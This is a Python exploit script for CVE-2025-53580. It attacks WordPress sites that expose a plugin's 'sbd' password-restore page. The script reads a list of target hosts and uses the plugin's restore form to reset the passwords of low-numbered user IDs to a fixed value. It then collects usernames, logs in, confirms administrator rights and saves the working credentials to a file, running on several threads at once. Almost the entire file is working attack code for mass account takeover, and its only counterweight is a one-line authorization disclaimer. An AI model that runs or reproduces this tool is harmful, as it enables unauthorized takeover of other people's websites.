#!/usr/bin/env python3 # By: Nxploited import os import sys import time import random from datetime import datetime from typing import List, Set, Tuple, Optional, Dict from urllib.parse import urlparse import requests import re import json as _json try: from colorama import Fore, Style, init as colorama_init colorama_init(autoreset=True) except Exception: class _D: RESET = "" RED = "" GREEN = "" YELLOW = "" CYAN = "" MAGENTA = "" BLUE = "" WHITE = "" BRIGHT = "" Fore = _D() Style = _D() requests.packages.urllib3.disable_warnings() TERM_WIDTH = 80 RESULT_FILE = "Nx_sbd_login_hits.txt" NEW_PASS = "NxploitedNX" MAX_USER_ID = 3 BASE_HEADERS = { "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.9", "Cache-Control": "no-cache", "Pragma": "no-cache", "Upgrade-Insecure-Requests": "1", "DNT": "1", } UA_POOL = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0", "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_5) AppleWebKit/605.1.15 " "(KHTML, like Gecko) Version/17.0 Safari/605.1.15", "Mozilla/5.0 (Linux; Android 11; Pixel 5) AppleWebKit/537.36 " "(KHTML, like Gecko) Chrome/121.0.0.0 Mobile Safari/537.36", ] CANDIDATE_RESTORE_PATHS = [ "/login", "/log-in", "/signin", "/sign-in", "/user-login", "/account/login", "/account/log-in", "/restore", "/password-reset", "/reset-password", "/lost-password", "/lostpassword", "/user/restore", "/my-account", "/members/login", "/member-login", "/customer-login", "/wp-login.php", "/blog/login", "/blog/log-in", "/auth/login", "/auth/restore", "/sbd-login", "/sbd-restore", ] AUTHOR_PATTERN = re.compile(r"/author/([^/]+)") AUTHOR_BODY_PATTERNS = [ re.compile(r'author-\w+">([a-z0-9_-]+)<', re.IGNORECASE), re.compile(r"/author/([a-z0-9_-]+)/", re.IGNORECASE), re.compile(r'"slug":"([a-z0-9_-]+)"', re.IGNORECASE), re.compile(r'"username":"([a-z0-9_-]+)"', re.IGNORECASE), ] def center(text: str, width: int = TERM_WIDTH) -> str: text = text.rstrip("\n") length = len(text) if length >= width: return text pad = (width - length) // 2 return " " * pad + text def print_banner() -> None: os.system("cls" if os.name == "nt" else "clear") banner = [ " ___ _ ___ __ __ __ ____ ____ ___ ____ __ __ ", " / (_)(_| |_// (_) / )/ \\/ )| | / \\| / \\ / \\ ", " | | | \\__ /| | / |___ |___ __/|___ \\__/| |", " | | | / -----/ | |/ \\----- \\ \\ \\/ \\| |", " \\___/ \\_/ \\___/ /___\\__//___\\___/ \\___/\\___/\\___/\\__/ \\__/ ", ] for line in banner: print(Fore.CYAN + Style.BRIGHT + center(line) + Style.RESET_ALL) print(Fore.MAGENTA + center("Exploit for | CVE-2025-53580", TERM_WIDTH) + Style.RESET_ALL) print(Fore.WHITE + center("Nxploited ( Khaled ALenazi )", TERM_WIDTH) + Style.RESET_ALL) print(Fore.WHITE + center("Telegram: @Kxploit | GitHub: github.com/Nxploited", TERM_WIDTH) + Style.RESET_ALL) print() print(Fore.YELLOW + center("Use strictly in environments where you have explicit authorization.", TERM_WIDTH) + Style.RESET_ALL) print() def log_line(level: str, color: str, msg: str) -> None: print(f"{color}[{level.upper()}]{Style.RESET_ALL} {msg}") def log_info(msg: str) -> None: log_line("info", Fore.BLUE, msg) def log_warn(msg: str) -> None: log_line("warn", Fore.YELLOW, msg) def log_err(msg: str) -> None: log_line("err ", Fore.RED, msg) def log_ok(msg: str) -> None: log_line("ok ", Fore.GREEN, msg) def get_random_user_agent() -> str: return random.choice(UA_POOL) def build_headers(referer: Optional[str] = None) -> dict: h = dict(BASE_HEADERS) h["User-Agent"] = get_random_user_agent() if referer: h["Referer"] = referer return h def normalize_url(url: str) -> str: url = url.strip() if not url.startswith(("http://", "https://")): url = "http://" + url p = urlparse(url) return f"{p.scheme}://{p.netloc}" def new_session(timeout: int) -> requests.Session: s = requests.Session() s.verify = False s.timeout = timeout s.headers.update(build_headers()) adapter = requests.adapters.HTTPAdapter(pool_connections=20, pool_maxsize=20, max_retries=1) s.mount("http://", adapter) s.mount("https://", adapter) return s def enum_from_author_param(url: str, timeout: int, delay: float = 0.0) -> Set[str]: users: Set[str] = set() for i in range(1, 10): try: author_url = f"{url}/?author={i}" headers = build_headers(author_url) resp = requests.get(author_url, allow_redirects=False, timeout=timeout, verify=False, headers=headers) if resp.status_code in (301, 302) and "location" in resp.headers: location = resp.headers["location"] m = AUTHOR_PATTERN.search(location) if m: users.add(m.group(1)) if delay > 0: time.sleep(delay) resp2 = requests.get(author_url, timeout=timeout, verify=False, headers=build_headers(author_url)) if resp2.status_code == 200: body = resp2.text for pat in AUTHOR_BODY_PATTERNS: for u in pat.findall(body): users.add(u) if delay > 0: time.sleep(delay) except requests.RequestException: continue return users def enum_from_rest_api(url: str, timeout: int, delay: float = 0.0) -> Set[str]: users: Set[str] = set() try: api_url = f"{url}/wp-json/wp/v2/users" headers = build_headers(api_url) resp = requests.get(api_url, timeout=timeout, verify=False, headers=headers) if resp.status_code == 200: try: data = resp.json() if isinstance(data, list): for user in data: if isinstance(user, dict): if "slug" in user: users.add(str(user["slug"])) if "username" in user: users.add(str(user["username"])) except ValueError: pass except requests.RequestException: pass if delay > 0: time.sleep(delay) return users def enumerate_usernames(url: str, timeout: int, delay: float = 0.0) -> Set[str]: users: Set[str] = set() users.update(enum_from_author_param(url, timeout, delay)) users.update(enum_from_rest_api(url, timeout, delay)) users.add("admin") try: host = urlparse(url).netloc.split(":")[0] domain_part = host.split(".")[0] if domain_part and len(domain_part) > 2: users.add(domain_part) except Exception: pass return users def find_restore_url_with_sbd( session: requests.Session, base: str, timeout: int, ) -> Optional[str]: for path in CANDIDATE_RESTORE_PATHS: url = base.rstrip("/") + path try: r = session.get(url, timeout=timeout, verify=False, headers=build_headers(url)) except Exception: continue if r.status_code != 200: continue body = (r.text or "").lower() if "sbd" in body: log_ok(f"{base} :: found front-end sbd page at {url}") return r.url log_warn(f"{base} :: no sbd page found in candidate restore paths") return None def try_sbd_restore_for_user_ids( session: requests.Session, restore_url: str, max_user_id: int, timeout: int, ) -> None: root = restore_url log_info(f"{restore_url} :: starting qcpd-uid=1..{max_user_id} brute with pass={NEW_PASS}") for uid in range(1, max_user_id + 1): data = { "qcpd-restore-pwd": "restore", "qcpd-restore-pwd-type": "user", "qcpd-uid": str(uid), "pass": NEW_PASS, } headers = build_headers(restore_url) headers["Content-Type"] = "application/x-www-form-urlencoded" try: r = session.post(root, data=data, headers=headers, timeout=timeout, verify=False, allow_redirects=False) except Exception as e: log_warn(f"{restore_url} :: POST uid={uid} failed: {e}") continue loc = r.headers.get("Location", "") log_info(f"{restore_url} :: POST uid={uid} → status={r.status_code}, Location={loc or 'none'}") def try_login_with_password( base: str, username: str, password: str, timeout: int ) -> Tuple[bool, requests.Session, str]: root = base.rstrip("/") s = new_session(timeout) login_url = f"{root}/wp-login.php" data = { "log": username, "pwd": password, "wp-submit": "Log In", "testcookie": "1", } headers = build_headers(login_url) headers["Content-Type"] = "application/x-www-form-urlencoded" headers["Cookie"] = "wordpress_test_cookie=WP+Cookie+check" try: r = s.post(login_url, data=data, headers=headers, timeout=timeout, verify=False, allow_redirects=True) except Exception as e: return False, s, f"login_error:{e}" logged_in = any(c.name.startswith("wordpress_logged_in") for c in s.cookies) if not logged_in: sc = r.headers.get("Set-Cookie", "") if "wordpress_logged_in" in sc: logged_in = True if not logged_in: return False, s, "login_failed_or_not_logged_in" return True, s, "login_ok" def check_admin_via_rest(session: requests.Session, base: str, timeout: int) -> Tuple[bool, str]: rest_url = f"{base}/wp-json/wp/v2/users/me" headers = build_headers(rest_url) try: r = session.get(rest_url, timeout=timeout, verify=False, headers=headers) except Exception as e: return False, f"rest_error:{e}" if r.status_code != 200: return False, f"rest_status:{r.status_code}" try: j = r.json() except Exception: return False, "rest_invalid_json" caps = j.get("capabilities") or {} if isinstance(caps, dict) and caps.get("manage_options"): return True, "ADMIN_CONFIRMED_REST(manage_options)" return False, "rest_no_manage_options" def verify_admin_dashboard(session: requests.Session, base: str, timeout: int) -> Tuple[bool, str]: root = base.rstrip("/") admin_urls = [ f"{root}/wp-admin/users.php", f"{root}/wp-admin/index.php", f"{root}/wp-admin/", ] global_markers = [ "wp-admin-bar", "adminmenu", "manage_options", "update-core.php", "options-general.php", ] users_markers = [ "users.php", 'class="username"', 'table class="wp-list-table', ] for u in admin_urls: headers = build_headers(u) try: r = session.get(u, timeout=timeout, verify=False, headers=headers, allow_redirects=False) except Exception: continue if r.status_code == 200: body = (r.text or "").lower() if any(m in body for m in global_markers): if "users.php" in u or any(m in body for m in users_markers): return True, f"ADMIN_CONFIRMED_WPADMIN({u})" elif r.status_code in (301, 302): loc = r.headers.get("Location", "") or r.headers.get("location", "") if "wp-login.php" in loc: return False, "wpadmin_redirect_login" return False, "wpadmin_no_strong_markers" def write_hit( base: str, username: str, is_admin: bool, detail: str, out_file: str = RESULT_FILE ) -> None: ts = datetime.now().strftime("%Y-%m-%d %H:%M:%S") admin_flag = "ADMIN" if is_admin else "USER" line = ( f"[{ts}] {base} - type={admin_flag} - user={username} " f"- login=/wp-login.php user={username} pass={NEW_PASS} - detail={detail}\n" ) if "/" in out_file: os.makedirs(os.path.dirname(out_file), exist_ok=True) with open(out_file, "a", encoding="utf-8") as f: f.write(line) def handle_site( site: str, timeout: int, ) -> None: base = normalize_url(site) label = base log_info(f"{label} :: starting") sess = new_session(timeout) restore_url = find_restore_url_with_sbd(sess, base, timeout) if not restore_url: log_warn(f"{label} :: no restore/login page with 'sbd' found, skipping target") return try_sbd_restore_for_user_ids(sess, restore_url, MAX_USER_ID, timeout) log_info(f"{label} :: extracting usernames and trying login with fixed password {NEW_PASS!r}") try: users = enumerate_usernames(base, timeout, delay=0.0) except Exception as e: log_warn(f"{label} :: username enumeration failed: {e}") users = set() if not users: log_warn(f"{label} :: no usernames discovered, fallback on admin only") users = {"admin"} for user in sorted(users): log_info(f"{label} :: trying login for one candidate user with fixed password") ok, s_login, detail_login = try_login_with_password(base, user, NEW_PASS, timeout) if not ok: log_warn(f"{label} :: login failed for user='{user}': {detail_login}") continue log_ok(f"{label} :: login OK for user='{user}', checking admin...") rest_ok, rest_detail = check_admin_via_rest(s_login, base, timeout) is_admin = False detail = detail_login if rest_ok: is_admin = True detail = rest_detail else: wp_ok, wp_detail = verify_admin_dashboard(s_login, base, timeout) if wp_ok: is_admin = True detail = wp_detail else: detail = f"not_admin({rest_detail}, {wp_detail})" write_hit(base, user, is_admin, detail) log_ok(f"{label} :: HIT for user='{user}' → admin={is_admin}, detail={detail}") return log_info(f"{label} :: done, no successful login found using {NEW_PASS!r}") def ask(prompt: str, default: str = "") -> str: if default: s = input(f"{Fore.CYAN}{prompt}{Style.RESET_ALL} [{default}]: ").strip() return s if s else default return input(f"{Fore.CYAN}{prompt}{Style.RESET_ALL}: ").strip() def ask_int(prompt: str, default: int) -> int: s = ask(prompt, str(default)) try: return int(s) except Exception: return default def run() -> None: print_banner() tfile = ask("Targets list file (one host/URL per line)", "list.txt") if not os.path.exists(tfile): log_err(f"Targets file not found: {tfile}") sys.exit(1) threads = ask_int("Threads (concurrent sites)", 3) timeout = ask_int("HTTP timeout (seconds)", 10) out_file = ask("Successful hits file", RESULT_FILE) targets: List[str] = [] with open(tfile, "r", encoding="utf-8", errors="ignore") as f: for line in f: line = line.strip() if line: targets.append(line) if not targets: log_err("Targets file is empty.") sys.exit(1) log_info(f"Loaded {len(targets)} targets.") start = time.time() from concurrent.futures import ThreadPoolExecutor, as_completed with ThreadPoolExecutor(max_workers=threads) as ex: futures = [] for site in targets: fut = ex.submit(handle_site, site, timeout) futures.append(fut) try: for _ in as_completed(futures): pass except KeyboardInterrupt: log_warn("Interrupted by user, shutting down threads...") ex.shutdown(wait=False, cancel_futures=True) sys.exit(1) elapsed = time.time() - start log_ok(f"Finished in {elapsed:.2f}s") log_ok(f"Confirmed hits written to: {out_file}") if __name__ == "__main__": run()